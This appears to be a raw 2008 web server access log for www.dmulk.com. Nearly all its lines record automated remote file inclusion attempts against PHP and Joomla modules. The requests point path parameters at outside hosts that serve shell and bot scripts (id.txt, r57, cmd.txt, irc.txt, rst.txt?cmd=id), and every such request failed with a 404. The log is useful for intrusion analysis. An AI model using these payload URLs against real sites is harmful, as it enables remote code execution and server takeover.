125.197.232.86 - - [22/Feb/2008:07:13:22 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.79.217.33 - - [22/Feb/2008:07:13:39 -0800] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.79.217.33 - - [22/Feb/2008:07:13:39 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.79.217.33 - - [22/Feb/2008:07:13:39 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.255.32.189 - - [22/Feb/2008:07:14:16 -0800] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.189 - - [22/Feb/2008:07:14:16 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.189 - - [22/Feb/2008:07:14:17 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.197.232.86 - - [22/Feb/2008:07:14:57 -0800] "GET /logs/access_080211.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.187.94.179 - - [22/Feb/2008:07:15:10 -0800] "GET /logs/access_080130.log/modules/agendax/addevent.inc.php?agendax_path=http://www.indicce.com/images/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.197.232.86 - - [22/Feb/2008:07:15:53 -0800] "GET /logs/access_080122.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.197.232.86 - - [22/Feb/2008:07:15:53 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.197.232.86 - - [22/Feb/2008:07:15:53 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.190.12 - - [22/Feb/2008:07:16:08 -0800] "GET /logs/access_080201.log//index.php?module=search&q=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
125.197.232.86 - - [22/Feb/2008:07:16:15 -0800] "GET /logs/access.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.190.12 - - [22/Feb/2008:07:16:18 -0800] "GET //index.php?module=search&q=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [22/Feb/2008:07:16:19 -0800] "GET /logs//index.php?module=search&q=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.70.58 - - [22/Feb/2008:07:16:30 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/alat/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.70.58 - - [22/Feb/2008:07:16:31 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/alat/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.19.176.162 - - [22/Feb/2008:07:17:28 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.winterhude.eu/cache/cmd/isis.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
84.19.176.162 - - [22/Feb/2008:07:17:28 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.winterhude.eu/cache/cmd/isis.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
125.197.232.86 - - [22/Feb/2008:07:17:33 -0800] "GET /logs/access_080130.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.116.173.131 - - [22/Feb/2008:07:17:53 -0800] "GET /logs/access_080201.log//index.php?module=search&q=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.116.173.131 - - [22/Feb/2008:07:17:53 -0800] "GET //index.php?module=search&q=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.116.173.131 - - [22/Feb/2008:07:17:54 -0800] "GET /logs//index.php?module=search&q=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.216.249.151 - - [22/Feb/2008:07:18:37 -0800] "GET /logs/access.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://panglima.freetzi.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.249.151 - - [22/Feb/2008:07:18:37 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://panglima.freetzi.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.249.151 - - [22/Feb/2008:07:18:37 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://panglima.freetzi.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.134.235.165 - - [22/Feb/2008:07:18:44 -0800] "GET /logs/access_080131.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.21.56.114 - - [22/Feb/2008:07:18:53 -0800] "GET /logs/access.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://h1.ripway.com/kambe2/nyari/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.21.56.114 - - [22/Feb/2008:07:18:53 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://h1.ripway.com/kambe2/nyari/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.21.56.114 - - [22/Feb/2008:07:18:54 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://h1.ripway.com/kambe2/nyari/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.116.173.131 - - [22/Feb/2008:07:19:10 -0800] "GET /logs/access.log/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.116.173.131 - - [22/Feb/2008:07:19:11 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.116.173.131 - - [22/Feb/2008:07:19:11 -0800] "GET /logs/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.79.217.33 - - [22/Feb/2008:07:19:13 -0800] "GET /logs/scripts.log//download.php?upload_filename=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.79.217.33 - - [22/Feb/2008:07:19:13 -0800] "GET //download.php?upload_filename=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.79.217.33 - - [22/Feb/2008:07:19:13 -0800] "GET /logs//download.php?upload_filename=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.116.173.131 - - [22/Feb/2008:07:19:47 -0800] "GET /logs/access_071230.log//index.php?module=search&q=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.160.33.164 - - [22/Feb/2008:07:20:00 -0800] "GET /logs/access_071230.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://CMD/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.187.94.179 - - [22/Feb/2008:07:20:30 -0800] "GET /logs/access.log/modules/agendax/addevent.inc.php?agendax_path=http://www.indicce.com/images/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [22/Feb/2008:07:20:42 -0800] "GET /logs/access_071224.log//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.koreandentists.org/bbs//data1/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [22/Feb/2008:07:20:43 -0800] "GET //PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.koreandentists.org/bbs//data1/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [22/Feb/2008:07:20:46 -0800] "GET /logs//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.koreandentists.org/bbs//data1/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.197.160.6 - - [22/Feb/2008:07:21:08 -0800] "GET //errors.php?error=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.189.85.162 - - [22/Feb/2008:07:21:47 -0800] "GET //download.php?upload_filename=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.189.85.162 - - [22/Feb/2008:07:21:47 -0800] "GET /errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
209.160.33.164 - - [22/Feb/2008:07:22:48 -0800] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://CMD/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.58.186 - - [22/Feb/2008:07:22:49 -0800] "GET /logs/access.log HTTP/1.0" 200 333394 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.119.158.50 - - [22/Feb/2008:07:23:00 -0800] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://66.153.86.221/www???????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [22/Feb/2008:07:23:00 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://66.153.86.221/www???????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [22/Feb/2008:07:23:01 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://66.153.86.221/www???????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
74.6.29.37 - - [22/Feb/2008:07:23:03 -0800] "GET /presto/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.60.70.58 - - [22/Feb/2008:07:23:30 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/alat/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.16.96.219 - - [22/Feb/2008:07:23:51 -0800] "GET /logs/access.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.96.219 - - [22/Feb/2008:07:23:51 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.96.219 - - [22/Feb/2008:07:23:52 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.21.56.114 - - [22/Feb/2008:07:23:56 -0800] "GET /logs/access_071230.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://h1.ripway.com/kambe2/nyari/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.79.217.33 - - [22/Feb/2008:07:24:51 -0800] "GET /logs/access_080201.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.16.96.219 - - [22/Feb/2008:07:25:01 -0800] "GET /logs/access_071230.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.197.232.86 - - [22/Feb/2008:07:25:06 -0800] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.197.232.86 - - [22/Feb/2008:07:25:06 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.197.232.86 - - [22/Feb/2008:07:25:07 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.148.27 - - [22/Feb/2008:07:25:08 -0800] "GET /index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://www.trinityprep.com/help.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
202.75.5.220 - - [22/Feb/2008:07:25:10 -0800] "GET /logs/access_071224.log//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.koreandentists.org/bbs//data1/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [22/Feb/2008:07:25:11 -0800] "GET //PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.koreandentists.org/bbs//data1/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [22/Feb/2008:07:25:11 -0800] "GET /logs//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.koreandentists.org/bbs//data1/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [22/Feb/2008:07:25:22 -0800] "GET /logs/access_071212.log//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.koreandentists.org/bbs//data1/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.197.232.86 - - [22/Feb/2008:07:25:30 -0800] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.197.232.86 - - [22/Feb/2008:07:25:30 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.197.232.86 - - [22/Feb/2008:07:25:31 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.101.222 - - [22/Feb/2008:07:26:05 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
18.55.2.206 - - [22/Feb/2008:07:26:05 -0800] "GET /index.php?option=com_jrecache&Itemid=&mosConfig_absolute_path=http://nybap.org/templates/rose.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
18.55.2.206 - - [22/Feb/2008:07:26:05 -0800] "GET /logs/index.php?option=com_jrecache&Itemid=&mosConfig_absolute_path=http://nybap.org/templates/rose.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.22.101.222 - - [22/Feb/2008:07:26:06 -0800] "GET /errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
207.210.90.250 - - [22/Feb/2008:07:27:36 -0800] "GET /logs/access_080108.log/index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://www.crazyteamclub.com/portal/administrator/components/com_phpshop/languages/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.210.90.250 - - [22/Feb/2008:07:27:37 -0800] "GET /index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://www.crazyteamclub.com/portal/administrator/components/com_phpshop/languages/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.210.90.250 - - [22/Feb/2008:07:27:37 -0800] "GET /logs/index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://www.crazyteamclub.com/portal/administrator/components/com_phpshop/languages/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.33.164 - - [22/Feb/2008:07:28:22 -0800] "GET //download.php?upload_filename=http://CMD/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.119.158.50 - - [22/Feb/2008:07:28:57 -0800] "GET /logs/access_080201.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://66.153.86.221/www???????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
83.16.96.219 - - [22/Feb/2008:07:29:03 -0800] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.96.219 - - [22/Feb/2008:07:29:04 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.96.219 - - [22/Feb/2008:07:29:05 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.75.5.220 - - [22/Feb/2008:07:31:12 -0800] "GET /logs/access_080130.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.koreandentists.org/bbs//data1/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [22/Feb/2008:07:31:13 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.koreandentists.org/bbs//data1/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [22/Feb/2008:07:31:13 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.koreandentists.org/bbs//data1/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.134.235.165 - - [22/Feb/2008:07:31:56 -0800] "GET /logs/access_080118.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [22/Feb/2008:07:31:57 -0800] "GET //PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.koreandentists.org/bbs//data1/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.22.61.119 - - [22/Feb/2008:07:32:01 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://giks.net/php/x/rst.txt?cmd=id HTTP/1.1" 404 275 "-" "-" "www.dmulk.com"
82.146.33.210 - - [22/Feb/2008:07:32:06 -0800] "GET /logs/index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
82.146.33.210 - - [22/Feb/2008:07:32:07 -0800] "GET /index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
202.75.5.220 - - [22/Feb/2008:07:32:56 -0800] "GET /logs/access_071212.log//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.koreandentists.org/bbs//data1/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.160.222.81 - - [22/Feb/2008:07:33:32 -0800] "GET /logs/access.log/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.54.45.2 - - [22/Feb/2008:07:33:33 -0800] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.160.222.81 - - [22/Feb/2008:07:33:33 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.249.151 - - [22/Feb/2008:07:33:33 -0800] "GET /logs/access_071230.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://panglima.freetzi.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.160.222.81 - - [22/Feb/2008:07:33:33 -0800] "GET /logs/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.79.217.33 - - [22/Feb/2008:07:33:43 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.79.217.33 - - [22/Feb/2008:07:33:43 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.79.217.33 - - [22/Feb/2008:07:33:43 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.190.12 - - [22/Feb/2008:07:33:54 -0800] "GET /logs/access_080201.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [22/Feb/2008:07:33:54 -0800] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [22/Feb/2008:07:33:55 -0800] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.113 - - [22/Feb/2008:07:34:28 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.113 - - [22/Feb/2008:07:34:28 -0800] "GET /megumi/?N=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.92.213.177 - - [22/Feb/2008:07:34:58 -0800] "GET /logs//source/includes/load_forum.php?mfh_root_path=http://novobx.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
81.92.213.177 - - [22/Feb/2008:07:35:05 -0800] "GET //source/includes/load_forum.php?mfh_root_path=http://novobx.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
202.75.5.220 - - [22/Feb/2008:07:36:05 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.koreandentists.org/bbs//data1/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.26.137.64 - - [22/Feb/2008:07:36:28 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [22/Feb/2008:07:36:29 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [22/Feb/2008:07:36:30 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
82.169.41.213 - - [22/Feb/2008:07:36:38 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.happyweighthappylife.nl/.x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
82.169.41.213 - - [22/Feb/2008:07:36:38 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.happyweighthappylife.nl/.x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
202.75.5.220 - - [22/Feb/2008:07:36:42 -0800] "GET /logs/access_080122.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.koreandentists.org/bbs//data1/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
